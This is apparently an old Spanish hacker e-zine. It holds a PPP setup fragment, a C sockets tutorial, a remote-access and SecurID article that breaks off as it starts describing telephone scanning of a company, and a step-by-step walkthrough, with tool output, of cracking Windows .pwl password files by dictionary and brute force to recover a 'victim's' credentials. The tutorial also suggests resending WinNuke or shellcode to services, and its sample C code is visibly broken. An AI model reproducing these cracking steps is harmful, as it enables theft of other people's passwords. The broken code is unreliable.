connect /etc/ppp/ispname #el nombre del segundo archivo ke vamos a crear
podría ser algo como entel rdc etc..
crtscts # tipo de emulación del modem
defaultroute
# si tu IP es estática ponla aquí seguida por dos puntos. ej: 100.100.100.100:
# Fin del archivo
El próximo archivo a crear es en este caso 'ispname' ke también irá en
/etc/ppp
/etc/ppp/ispname
#aki comienza
/usr/sbin/chat -v ABORT BUSY ABORT 'NO CARRIER' "" ATZ OK ATDT CONNECT \r ogin: ssword:
#todo esto va en una sola línea
#fin
a este archivo debes darle permisos de ejecución, lectura y escritura.. algo
así como 'chmod 700' por ejemplo.
Esto es muy importante si no kieres ke cualkier persona ke tenga acceso a tu
pc escriba simplemente cat /etc/ppp/ispname y vea tu login y passwd del server
de inet :PPP
Ahora ya estás listo para conectarte a tu isp tecleando ' pppd '
para saber si ya estas conectado teclea 'ifconfig' . estarás conectado cuando
aparezca ppp0 como protocolo....
Algo ke ya se me olvidaba... para desconectarte 'ppp-off' jejeje.
AnDyK
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#########################################
ø ø
ø 9.- El poder del Internet ø
ø Programacion de Sockets ø
ø ø
#########################################
_______________________________________________________________ By Madjester
Por Madjester, el c0der de NTerror
Me siento un poco mal haciendo este texto, debido que con este informacion
podria quedar la cagada el internet (si, ustedes van a poder hacer exploits mas
poderosos). este papel va a ser lo mas completo possibel y es un trabajo en
progreso. Voy a hablar un poco sobre tcp, ip, cosas asi, y mostrare ejemplos
(como mi super smurf). Si hay errores, pues de mandamelos a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Mi llave pgp esta abajo (como si es que lo van a usar...) empecemos...
En este texto no describire el modelo OSI, si quieren saber que es, etcetera..
sacanse algo sobre tcp-ip, o sacan el "beej's guide to socket programming". el
modelo OSI es importante, pero es todo bajo nivel.... Pero si vamos a ver como
se hace Unix socket programming. Empecemos con simple connexiones Internet, con
udp y tcp.
Para empezar tenemos que saber en que poner nuestra information, como el host
objetivo, y el puerto. el primero es un simple int, si, un simple int. Es
proveera le sockfd (el descriptor de archivo de socket). Si, es como abrir un
archivo a traves el internet... Ok, este int tiene que guardar un sockfd, y
para hacer eso usamos el funcion socket(). se usa de la forma
sockfd=socket(DOMAIN, SOCK, int protocolo);
el protocolo se puede ponerle zero, (para ahora, por lo menos). el domain se
puede poner AF_INET (para internet) y el SOCK puede ser SOCK_STREAM, SOCK_DGRAM,
SOCK_RAW, o SOCK_PACKET, pero nosotros solo cubriremos el SOCK_STREAM, y el
SOCK_DGRAM por ahora que son tcp y udp respectivamente, ok, con eso hecho,
aprontanse para confusion maximo.... los structs.
el primer struct es el sock_addr, que no vamos a usar directamente. en ves
usaremos el wrapper struct sockaddr_in (in para internet). el struct es asi:
struct sockaddr_in {
short int sin_family; /* Tipo de dominio (AF_INET */
unsigned short int sin_port; /* Mumero de puerto */
struct in_addr sin_addr; /* Dirrecion de internet */
unsigned char sin_zero[8]; /* para hacerlo el tamano de
sock_addr */
};
Esto va a ser mas confuso... las conversiones (dejemos el struct a un lado
por ahora)
El byte ordering del puerto de internet y la direccion debran ir en Network
Byte order, basicamente, si pasa 23 a in_addr.sin_port debras hacer htons(23).
Las conversiones son de host byte a network byte. hay:
htons (host to network short)
htonl (host to network long)
ntohs (network to host short)
ntohl (network to host long)
debran ser faciles de recordar, si son solo abbreviationes. para usarlos un
ejemplo es el del puerto y hacer htons(int puerto). pero si queremos convertir
algo mas grande, como un IP por ejemplo, tendras que hacer ntohl(). Pero no, no
puedes hacer simplemente htonl(127.0.0.1) porque el "127.0.0.1" es un string,
debido a los puntos. tendras que usar el inet_addr("127.0.0.1"), y lo mas
maximo es que lo devuelve en Network byte, asi no tendras que hacer htonl. esto
esta confuso, relealo, y to te lo apprenderas. Lo unico que debes saber por
AHORA es:
1. Pasar un int (simple int) a htons para usar en sin_port
2. Pasar los ips de forma numero y puntos a inet_addr() para ponerlo en
sin_addr.
Eso es refacil. (y todavia falta como usar DNS). Continuamos, ok?
Para commensar todo esto, nuestro primer funcion va a ser el socket(). El
socket() devuelve un descriptor de socket, para ponerlo en un int. Para
usarlo usariamos:
int sockfd;
sockfd = socket(argumentos)
Los argumentos del socket() son:
socket(DOMINIO, TYPO, PROTOCOLO)
El dominio para usar sockets de INET es AF_INET, el TYPO puede ser SOCK_DGRAM
para UDP o SOCK_STREAM para TCP. El protocolo (por ahora) es simplemente 0
(hay otros, buscalos).
Segundo, como nos connectamos? con el connect(), es simple esto tambien. su
syntaxis es connect(sockfd, sockaddr *dest_addr, int longdir). El sockfd ya
lo explicamos, el dest_addr solo pondremos un cast a un sockaddr_in.sin_addr,
el longdir es solo sizeof(struct sockaddr), exactamente eso. seria
connect(sockfd, (sockaddr *)&sockaddr_in.sin_addr, sizeof(sockaddr))
eso es TODO, te puedes connectar.
Ok.. ahora tendremos que actualmente
MANDAR algo. esto se hace con send() o sendto(), pero tambien se puede con
read() y write(), que flojera usaremos ahora. este call es FACIL (por eso
lo usamos, por ahora). EL syntaxis es read(sockfd, buffer, ceunto), el sockfd
no sabemos que es ;), el buffer es el nombre de un array de characteres donde
mandar lo que lees, cuento es el maximo que recebiremos
(ponlo como sizeof(buffer)).Facil huh? y se puede usar con CUALQUIER
descriptor, incluso los de archivos. para mandar usaremos write() (UGH!, esto
debe ser obvio). el syntaxis es write(sockfd, buffer, cuento), sockfd, check!,
buffer, es el array de characteres para mandar (no olvides poner tus \n's),
cuento es el maximo que mandamos (setealo a sizeof(buffer)). Ok, sufficiente,
hagamos una programa MUY simple como ejemplo.
#include
#include
#include
#include
#include
#define HOST "127.0.0.1"
int main()
{
int sockfd;
char buff[1024];
struct sockaddr_in in_addr
sockfd = socket(AF_INET, SOCK_STREAM, 0);
in_addr.sin_family = AF_INET;
in_addr.sin_port = htons(23);
in_addr.sin_addr = inet_addr(HOST);
bzero(&(their_addr.sin_zero), 8);
connect(sockfd, (sockaddr *)&in_addr.sin_addr, sizeof(sockaddr));
read(sockfd, buff, sizeof(buff));
printf("recibimos:\n%s\n", buff);
close(sockfd);
return(0);
}
Eso fue demasaido....
Una nota mas, la funcion close... este casi se explica solo, solo cierra un
sockfd, se hace close(sokfd), eso no mas. NADA mas es necessario. pero NUNCA
olviden de hacerlo, o tendran MUCHAS problemas.
Pero, como podria ser util esto?, un ejemplo es rehacer el winnuke...lo
UNICO que hace es mandar una linea de charactes... haces write(sockfd,
"FUCKYOUMICROSOFT\n", 16) y listo. Cachais? o podrias ponerle un shellcode
programa y mandarlo al daemon con el write, hartas possibilidades. Solo
tienen que ver, hasta podrias hacer un port scanner que lee los banners
cuando lo hace, MUY facilmente.
Tengo que decir gracias a: NTerror, Dark Cl, plaxius, y todos los demas :P
Hasta entonces, fumen hierba, no hueveen con pacos, y siempre, pero SIEMPRE
amen esa musica trance, Yeah!, hasta luego LOCOS :P
El Madjester.
Mi llave PGP:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
mQGiBDaXOKwRBADX3VaYxiXUjwreJQwoUyOWv8KB930diS7vB4ef6ICELGa2T8R/
vj+SfWrfxStkI5gG9u6HrJT+26pbUjz8gvUcwm0hbWzU67fqfFYoy8RmCJrPFT2U
NHOUAhDUH0kbq9Q+rZn6Zn4OA2+yaDl/MDOBbGamsw1JexgenNFoNHuQOQCg/xni
jqUQcanvItRXWGDqAp25Hi8EALgx/rkAy56k8LbL7TMKUmf0A/M4IKCrs9kIRSe7
bguDhjHsWTbak8Mj9tHOovkYp4M/5PwxAt8K+flDVN7qa4VpnVUSzSniW+rXdyOv
7nOTBysffi8P2GbE1Am6G6CkIjLqDZnwMoFW/7Q4aIXjTcMZ5rMqsjPkrXrAxn+C
v1zJBADLsAcxPIiafLiHZUb4epVza4H/+DuJOkYaR7ZvQnzC19VCVrfqaRkxpJvg
nJkPpIznLKHFht2Mpe+5Fq1LtEmnZGSpNY0UICnUJzZcCEErVvg1rofYVlU9jkS0
OwOPqJCmxN6Z/dhWIp7kWzmWn2z+cK9TC+jdTdkLHGGZFPcyBbQkTWFkamVzdGVy
IDxtYWRqZXN0ZXIzMzNAaG90bWFpbC5jb20+iQBLBBARAgALBQI2lzitBAsDAgEA
CgkQXokCw2IhsVK2/QCg0WX5QTPGbzgRFA6QkKP6BkEux3EAoOz9MEcOELbVv7ec
8zCUB4mUtJssuQINBDaXOK4QCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4
INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3b
zpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9G
AFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67
VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM
2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/wMqGDyr05Z
VdKjAmxzLcsJjWcDiq7glzBsYpV7alkdE/s2ni+qD5xn+eCiARnGdeSo4ne07tG4
XpMa6p782MBoN2MPQE/9hLKnt4XiewPXWfJTW1q7T+t2PiChzdkAWIRJUyTp/Cc0
dEsrzp32gIeITmfI/gnoCvJNNjGu3FKksW5cnFFMLuz/6atMcMDvmrLBIlOW1pRQ
s+pGqj11MP5/AHJGO8740qEG2vaMaoZuQRyYkIZRRpKTEKw9NzXClEGPcQrGCclp
j5qir4c8q/bNmHzXdUTnjJDZJt6XYdjhasOmG6sjflrsLkmRMFG0Y9Xr8hC28Df2
bvLfvsROHSc1iQBGBBgRAgAGBQI2lziuAAoJEF6JAsNiIbFS5SIAoJeZLwc5CpXC
G89Y4E7pgdzdDt52AKC0ZgmHFwB/vAhuN+lksyZ3OfIl9Q==
=DOAa
-----END PGP PUBLIC KEY BLOCK-----
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
############################
§ §
§ 10.-Crackeando Pwl's §
§ PWLOSR §
§ §
%%%%%%%%%%%%%%%%%%%%%%%%%%%%
________________________________________________________________ By ArcangNet
Saludos, compa hace tiempo que no escribo para su e-zine y despues
de un tiempillo por hay bagabudiando y trabajando duro, me he decido a
escribir una pequeña intro sobre el programa pwlosr, que sirve para
hacker los archivos .pwl del windows95/98.
Nota: es texto es introductorio y explicar la utilizacion del
programa pwlosr y sus opciones a la hora de hackear un archivo .pwl de
windows, para aquellos que lo saben todo y al leer este tipo de
articulos se siente insultados por fa´ stop!, esto, esta escrito como la
finalidad de dar una intro a los newbies, abtenerse de leerlo aquellos
que lo saben todo, plis!
Comienzo con una introduccion sobre nuestro objetivo, los archivos
.pwl. Dichos archivos como todos sabran son los que guardan el bendito
nombre de usuario y el password, de la victima, ejem: newbies; newbies,
Ah! aprovechando esto quiero decir un bug relacionado con esto. Muchos
flojos acostumbran a poner el nombre de usuario y el password iguales, y
para no estar tecleando esto dos veces simplemente hacen un ctrl+c y
ctrl+v, lo que hacen aqui es pegar el nombre de usuario a la casilla de
verificacion de passwors(y que con eso), que cuando uno copia un texto
este se guarda en el portapapeles y cualquiera hacker se puede meter en
una computer y sacar el contenido de portapapeles, por si no sabian.
buenos seguimos.
Abrimos una ventana de DOS, desde el windows, nos ubicamos en donde
se encuentra la carpeta pwlosr y el ejecutable.
x:\pwlosr\pwlosr
(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
USAGE: PWLOSR.EXE /LIST[:E] [PwlFileName] [UserName] [UserPwd]
- to dump specified PWL file via necessary parameters
use attribute 'E' for display technical information
PWLOSR.EXE /VOCABULARY [PwlFileName] [UserName] [VocFile]
- to detect password for PWL file by some WordList
PWLOSR.EXE /BRUTEFORCE [PwlFileName] [UserName]
- to perform brute force password detection
PWLOSR.EXE /CONTINUE
- to resume aborted session
You must use the Full_User_Name !!! It is strongly necessary.
This program not support the Previous MD95 PWL files. Look for
my old utility named PWL.EXE!
Guys, this is crazy that I coded it again. But, maybe You
will use it. Good luck! I want to know Your results.
FidoNet: 2:461/133.69 Hard Wisdom
Bueno como ven nos da una descripcion del programa, version, autor y
mas...
Pero en realidad no nos interesa todo esto(ah!, ya te diste de
cuenta de los comandos), empezemos.
==Pequeño glosario para los capullos==
[PwlFileName]=Este en archivo con la extension .pwl, que vamos
hackear.
[UserName]=Nombre de Usuario.
[UserPwd]=You password.
[VocFile]=Diccionario de palabras.
==Primer paso==
Nota: el archivo .pwl, que se encuentra aqui fue creado por mi, nombre
newbies y el password new
PWLOSR.EXE /LIST[:E] [PwlFileName] [UserName] [UserPwd].
pero yo puse
pwlosr.exe /list:e newbies new new
me dio el resultado de:
(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
File: 'NEWBIES.PWL' has size 2B0h bytes
for user 'NEWBIES' with password 'NEW' contains:
-[Technical Information]---------------------------------------
Password file version: 968582E3; Offset to Header: 00000252
Unknown Align: 0000; UnkCount: 00000001; CheckSeed: 00000001
CryptoSeed Array = ( 00000000, 00000000, 00000000, 00000000
00000000, 00000000, 00000000, 00000000
00000000, 00000000, 00000000, 00000000
00000000, 00000000, 00000000, 00000000 )
-[Resources pointers]------------------------------------------
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00
Ultima parte:
FF FF FF FF FF FF FF FF - FF FF FF FF FF FF FF FF
FF FF FF FF FF FF FF FF - FF FF FF FF FF FF FF FF
FF FF FF FF FF FF FF FF - FF FF FF FF FF FF FF FF
FF FF FF FF FF FF FF FF - FF FF FF FF FF FF FF FF
---------------------------------------------------------------
CryptoSign = B1 C0 A2 DD 3E 1F 95 87 69 BF E9 2E 2D 25 22 1D
CheckoSign = 0B D8 CC 19 AA BE A6 06 44 84 98 4A 69 1F 21 05
---------------------------------------------------------------
Data = ( 0290, 0292, 0294, 0296, 0298, 029A, 029C, 029E, 02A0
02A2, 02A4, 02A6, 02A8, 02AA, 02AC, 02AE, 02B0 )
Len. = ( 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000
0000, 0000, 0000, 0000, 0000, 0000, 0000 )
-[Dump]--------------------------------------------------------
0290: 31 98 42 AE - EF C7 C0 E8 - EE FD DF 9B - A1 92 D4 ED
02A0: 77 A1 34 C4 - 51 E3 E8 FC - 20 CC 77 85 - 5B D7 42 A0
-[Character]---------------------------------------------------
0290: 1 ÿ B « ´ Ã + Þ ¯ ² _ ø í Æ È Ý
02A0: w í 4 - Q Ò Þ ³ . ¦ w à [ Î B á
---------------------------------------------------------------
-[Type]-[The resource location string]--------------[Password]-
---------------------------------------------------------------
Key Entrys: 0; Number of resources: 0.
Toda la info. que despliega aqui sobre los accesos a intranet(no
sale nada, por que no tengo), mis conexiones a iNET
==Segundo Paso==
PWLOSR.EXE /VOCABULARY [PwlFileName] [UserName] [VocFile]
pero yo puse:
pwlosr /vocabulary newbies.pwl newbies pwlosr.voc
me dio el resultado
(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
Beginning vocabulary session for file 'NEWBIES.PWL',
of user 'NEWBIES' via vocabulary 'PWLOSR.VOC'.
Password 'NEW' - maybe correct!
Totally trained 70 passwords, Vocabulary position 497.
Elapsed time 0 seconds; Average speed 70 passwords per second.
Cracked passwords 1. Check them under MD95 Logon.
Bueno, creo que esta les parecera tradicional, ya que se utiliza un
diccionario y se encuentra la clave que es new. Ah! como vemos tambien
indica el tiempo, la velocidad de comprobacion de password o palabras
verificadas por segundo.
==Tercer Paso==
PWLOSR.EXE /BRUTEFORCE [PwlFileName] [UserName]
pero yo puse:
pwlosr /bruteforce newbies.pwl newbies
me dio como resultado:
(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
Beginning vocabulary session for file 'NEWBIES.PWL',
of user 'NEWBIES' via vocabulary 'PWLOSR.VOC'.
Password 'NEW' - maybe correct!
Totally trained 70 passwords, Vocabulary position 497.
Elapsed time 0 seconds; Average speed 70 passwords per second.
Cracked passwords 1. Check them under MD95 Logon.
D:\Pwlosr>pwlosr /bruteforce newbies.pwl newbies
(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
Beginning brute session for file 'NEWBIES.PWL',
of user 'NEWBIES' with EnumStr:
<<0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZÇüéâäàåçêëèïîìÄÅÉæÆôöòûùÿÖÜ£øØ׃>>.
Using password length 0 characters.
Using password length 1 characters.
Using password length 2 characters.
Using password length 3 characters.
Password 'NEW' - maybe correct!
Bueno, aqui simplemente se utiliza la fuerza bruta, el programa lo
que hace es ir creando palabras en forma creciente de diferente
longitud, como podemos ver arriba, este comprueba primero 0 caracteres,
1, 2, 3, aja aqui por fin encuentra el password que es new, un password
de 3 caracteres. Como ya sabes mientras mas largo el password mas
tiempo, tambien influye la velocidad de tu procesador.
==Cuarto Paso==
PWLOSR.EXE /CONTINUE
pero yo puse:
pwlosr /continue
me dio como resultado:
(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
~~~~~~~~~~~~~~~~~~~~~~~~~
Error (2): No session storage file!
No dio este error, por que no tengo una session previamente creada,
o en donde quedo el proceso anteriormente(creo??))))))
==Nota final==
Hay veces que el nombre del archivo .pwl, no coincide en el nombre
de usuario. Eso lo puedes arreglar facil editando el archivo system.ini,
que se encuentra en la carpeta de windows.
NEWBIES=C:\WINDOWS\NEWBIES.PWL
Aqui como vemos el nombre de usuario si coincide con nombre del
arhivo si en cierto caso esto no coinciden, simplemente cambia,
supongamos que tenemos esto:
carlos pedro=C:\WINDOWS\NEWBIES.PWL
Cambia ¨carlos pedro¨ por la cadena que mas te combenga y guarda los
cambios y listo.
Un Cordial Saludo a todos!
Arcangnet 0;-)
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
$$$$$$$$$$$$$$$$$$$$$$$$$$$$
ø ø
ø 11. Accesos Remotos ø
ø y otras Hiervas ø
ø ø
$$$$$$$$$$$$$$$$$$$$$$$$$$$$
______________________________________________________________By PlaXiuS
Hola chikos como han estado espero que super , yo he tenido un mes muy
dificil ya que por mientras muchos disfrutaban vacaciones , yo me quede
matandome en el trabajo .. horas extras diran ustedes!! Nop solo por
amor al arte ..ademas tengo una family que alimentar .
Bueno basta de rollos .. y vamos a lo que nos interesa .
En el ultimo tiempo la tendencia de las grandes empresas es que sus
trabajadores puedan acceder a la informacion desde cualquier lugar y a
cualquier hora ; en especial cuando son empresas en las cuales sus
empleados trabajan la mayor parte del tiempo en terreno . Asi como la
tendencia y la idea (ya practicada en algunos paises desarrollados) de
que los empleados trabajen desde sus casas ya no es tan descabellada
como hace a¤os atras .
Solo hay que ponerse a pensar la cantidad de dinero que se ahorraria
una empresa en infraestructura , administracion , etc ... ; Ademas
que por parte del trabajador que no tendria que gastar tiempo y
dinero en locomocion , colacion , etc.. pudiendo distribuir de forma
inteligente y adecuada su tiempo.
De hecho , algunos estudios afirman que esta forma de teletrabajo ,
aumentaria la produccion y calidad del servicio (aunque por lo menos
lo veo muy poco futuro en sudamerica , por la mentalidad tanto de los
empresarios como de los trabajadores) . Es asi que cada dia mas y mas
empresas compran e implementan tecnologia en este nuevo servicio que
puede marcar la diferencia entre una empresa y otra . Un trabajador
con acceso a informacion puede dar un servicio agil y oportuno ..
Recordad que "La informacion es Poder" aquel que la maneje sera el que
perdure .
Como funciona un acceso remoto :
B
| RED
A--------------------- Equipo
| | ####### Linea ######### Remoto
C D----| PBX |/////////////| MODEM |-----"E"
####### Telefonica #########
Fig 1.1
(Uff Dali era una cagada al lado Mio XXXDD , como veran no soy muy
gueno pal dibujo ni pa nada , pero hago lo que puedo ; despues me
escriben diciendo que copio los textos ... " y los dibujos tambien
jajaja)
Bueno los accesos remotos pueden estar dirigidos a un solo servicio ;
como bajar tu correo remotamente , o accesar a internet a travez de
un enlace etc.
pero se esta dando con bastante fuerza el conectarse a la red en si ..
,teniendo los mismos accesos que al estar en la oficina , ya sean
impresoras , softwares , correo , etc ...
En la fig 1.1 se observa un esquema tipico de un acceso remoto , el
equipo "E" quiere tener acceso a la "RED" para lo cual se conecta
telefonicamente a una PBX , esta PBX conectara al equipo a "E" al
equipo de acceso remoto "D" que sera el encargado de autentificar y
validar al equipo "E" a la red . Espero que se entienda . :: Uff ojala.
El equipo "D" puede ser un servidor RAS o otro que se asemeje como
podria ser un SHIVA . Bueno no creo que tenga que explicar mas sobre
esto no ???
La tendencia siempre ha sido crear servicios de acceso remoto a travez
de las lineas telefonicas , pero hay una nueva tendencia que pretende
masificar los accesos remotos e incluso impulsar con mayor fuerza el
"TELEWORKING" como le dicen los gringos . Bueno esta tendencia mas o
menos conocida por todos , son las VPN`s (Virtual Private Network o
Redes Privadas Virtuales) .
VPN en que consiste
====================
Bueno una VPN no es mas que una interconeccion de redes a traves de
internet , antiguamente (bueno hasta ahora) tenias que tirar un
enlace directo con la empresa o institucion con la cual querias
interconectarte por X motivo ! ej . por algun servicio en especial ,
alguna operacion en conjunto , etc.. Este tipo de enlace , que podia
ser telefonico o digital (kien no ha visto una DTU instalada por ahi),
lo cual aumentaba el costo de esta operacion .
Ahora gracias a las VPN`s solo se tendrian que hacer un par de cambios
en los firewalls de ambas entidades para poder realizar dicha
interconeccion .. Ademas de habilitar el protocolo PPTP que es el que
hace posible la creacion de los llamados tuneles entre dos entes
interconectados . sorry PPTP = Point to Point Tuneling Protocol ,,, si
tu lo has dicho .. es como el nuevo hermano de PPP . La gracia del
PPTP es que puedes encapsular paquetes , tcp/ip , ipx , y netbeui
de tal forma que facilmente te podrias logear a una novell a travez de
inet (en teoria jamas lo he probado en la practica) .
Bueno veamos otro monito para explicar !!!
Empresa1 Empresa2
\ &&&&&&&&&& /
\ && && _____/
------ & Internet &
_____ && && _____
/ &&&&&&&&&& \
/ \
Empresa3 Empresa4
Fig 2
(Este quedo peor que el otro jejej !!!)
Bueno imaginate que la empresa 1 necesitara conectarse a la empresa 4
para poder accesar a un servicio que esta empresa le da . Bueno ,
bastaria con darse accesos , mutuamente a traves de los firewalls y
asi evitarse un gasto extra con un enlace directo a la empresa X .
Ademas de hacer Ip masquereding !! bueno creo que asi se dice jeje !!
o mas bien dicho solicitar paquetes a traves de internet con una ip
valida ... me explico .
¦¦¦¦¦¦¦¦¦¦
¦ USer 1 ¦ -----------( router )--------- otra Red
¦¦¦¦¦¦¦¦¦¦ |
10.0.0.20 | 207.xx.xx.xx ?????????? "" ""
(firewall) ------------------ ?? Internet ??
?????????
10.1.1.4 199.xx.xx.xx |
(Host serv)---------(Firewall serv)--------|
Fig 3 .
Este me quedo mas bonito jejej!!!
Bueno expliquemos el procedimiento , le user uno con ip 10.0.0.20
corre una aplicacion que apunta a una ip 10.1.1.4 , al llegar al
router este lo envia al firewall ya que dentro de las tablas de
ruteo sale indicado que el paquete tiene que ir por esta subred
por decirlo asi .. al llegar el firewall este reconoce esa ip como
una ip Externa (no significa que sea valida en internet) asi que
toma el paquete y le pone su ip y lo transmite a travez de PPTP a
dentro del paquete PPTP va la direccion de origen y destino .
al revisar sus tablas internas el firewall sabe
que esa direccion ip corresponde a la red interna del firewall
199.xx.xx.xx , asi que le manda el paquete ... al llegar a este
firewall , este revisa las direcciones internas (o sea las que tiene
dentro del paquete ) para saber a que equipo la envia .. asi que lo
manda al host 10.1.1.4 . El host responde la peticion que volvera al
firewall 199.xx.xx.xx que devolvera el paquete al firewall
207.xx.xx.xx , este vera la informacion dentro del paquete y remitira
este al user con ip 10.0.0.20 . uFff espero que haya quedado claro ..
Bueno , no todos los firewalls tienen esta opcion ya que deben venir
con las utilidades de VPN , ya que los datos que se transmiten a travez
de inet deben ser encriptados , ademas de tener que crear tablas
internas (muy parecidas a las tablas de ruteo) que se encargan de esta
forma de comunicacion .
Ahora diran ustedes , que cresta tiene que ver las VPN`s con el
teleworking . Pues muy facil .. hoy en dia es posible encontrarse en
muchos lugares del mundo con conexiones tipo cablemodem o RDSI en los
hogares . De esta forma al trabajar en inet .. se puede configurar el
firewall para que conteste peticiones de ciertas direcciones ips que
perfectamente podrian ser de un hogar .. el problema son los proveedores
con direcciones Ip automaticas o DHCP , con los cuales se dificulta el
nivel de acceso a las redes VPNS pero ya hay soluciones para este tipo
de problemas y ya veremos por que !!!
Servidores De Seguridad
========================
EL gran problema de los accesos remotos a redes es la seguridad de las
mismas ya que en pocas palabras un red con acceso remotos activo es una
victima en potencia de intrusiones y vandalismo (notese dije vandalismo
no hacking jeje) Ademas nadie sabe quien entrara a tu red , Talves un
chiko malo o bueno ..solo es cuestion de suerte !!!!
Es asi que para evitar los vulnerabilidades de las redes a traves de
este tipo de acceso y mejor aun , para aumentar la seguridad y control
sobre la misma existe los llamados "SERVIDORES DE SEGURIDAD" .
Algunos de estos server proporcionan complejos niveles de
auntentificacion y un gran elevado contros de acceso ... lo que permite
al administrador resolver las grandes preguntas de siempre ... QUIEN? ,
COMO? , CUANDO? . Ademas estos servidores entregan un nivel
centralizado de autentificacion lo que ahorra tiempo en la administracion
de una red ya que tener muchas claves y accesos solo terminan complicando
a los usarios y al administrador .. es mejor tener un solo nivel de
autentificacion pero "BUENO Y SEGURO" .
Un claro ejemplo de estos Servidores de seguridad serian
Radius
Tacacs
Ace
Bueno yo me centrare en el servidor que me ha tocado conocer mas a fondo
que es el Ace/Server de Security Dynamics .
Este servidor tiene la posibilidad de ser instalado tanto en Unix como
en NT y se basa en un complejo sistema de autentificacion que se basa en
algoritmos numericos los cuales serviran como PASSCODE para el sistema .
La idea del sistema es que a cada usuario se le entregara un dispositivo
de hardware ( en forma de llavero o Tarjeta ) el cual mostrara en un
display un numero de 6 digitos que cambiara cada 60 segundos .. (Sii ese
sera el PASSCODE pero aun no es tan simple !!!) , en la parte trasera
del dispositivo existe un numero con el cual podremos asociar esta
tarjeta que de ahora en adelante llamaremos SecureID , a un User .
Cada una de estas SecureID tienen un algoritmo diferente de tal forma
que se podria encontrar el algoritmo de una de ellas pero no de todas
(espero que se entienda la idea ) pero aun asi existe otra barrera de
seguridad que pasar que el llamado "PIN" este pin puede variar de 4 a
8 carateres que pueden ser alfanumericos .Este Pin sera vital para el
buen funcionamiento del sistema de autentificacion ya que sera el
complemento del passcode .. me explico . El usuario al identificarse al
sistema debera ingresar su UserId y luego su PASSCODE , este passcode
estara compuesto de el "PIN" y ademas del codigo de 6 digitos que te
entregue la SecureID .
EJ :
UserID : PlaXiuS
PASSCODE : 4638009354
Donde 4638 es el "Pin" y 009354 Sera el Codigo que
entrogo la SecureID .
Como veran es bastante dificil poder burlar estos niveles de seguridad
ya que primero deberias tener en tu poder , el UserID (facil no) ,
la SecureID (un poco mas complicado no crees) , y el codigo "PIN" .
Ahora cual es la importancia del pin : Pues si alguien quisiera entrar
al sistema con vuestra SecurieID , le seria imposible sin saber el PIN
ademas este pin generalmente (por cuestion de seguridad) se le pide al
sistema que lo cree de forma automatica , asi que el administrador solo
tendria que entrear este codigo al usuario bajo absoluta reserva ya que
de esto depende el exito del sistema .
La gracia de estos sistemas es que se podria centrar la administracion
de diferentes servicios y sistemas en un solo sistema de seguridad ..
Es decir que podrias tener las mismas pass (SEGURAS) en un sistema NT
UNIX , acceso remoto , etc ...
Ademas se puede realizar trabajos de accesos globales a un sistema en si
, es decir muchos de estos sistemas de seguridad , dan la opcion de crear
una red estrucutrada de seguridad para redes globels . Ej : Un usuario
viaja a Londres y necesita conectarse a un servicio a su red local en
Mexico . El usuario se conecta a la sucursal de londres el cual le pedira
autentificarse ; si los sistemas de seguridad estan sincronizados a nivel
global ; este usuario podria autentificarse en londres , permitiendole
tener acceso a su red a travez del enlace entre sucursales .
Otro ejemplo mas practico :
Un usuario X necesita conectarse al puerto X del server de la empresa ,
ya que a travez de ese puerto puede revisar su correo en formato HTML ;
solo tendrias que configurar el Firewall para que exiga auntetificar al
usuario que quiere conectarse a ese puerto a travez del server de
seguridad . Para este caso el firewall deberia tener soporte para el
sistema de seguridad .
Problemas con la Seguridad
==========================
El aumento de los accesos remotos traen consigo una gran cantidad de
riesgos de seguridad . De hecho los accesos remotos a redes son una
gran tentacion para cuelaquiera que sea "curioso" .
Formas de Ataque :
Vamos a hacernos una idea de como se podria atacar una red de acceso
remoto .
Tenemos una empresa X y sabemos que la mesa central tiene el numero
3800000 por decir algo , y sabemos que todos los anexos internos son
del tipo 380xxxx , lo qu tendriamos que hacer es un scaneo telefonico
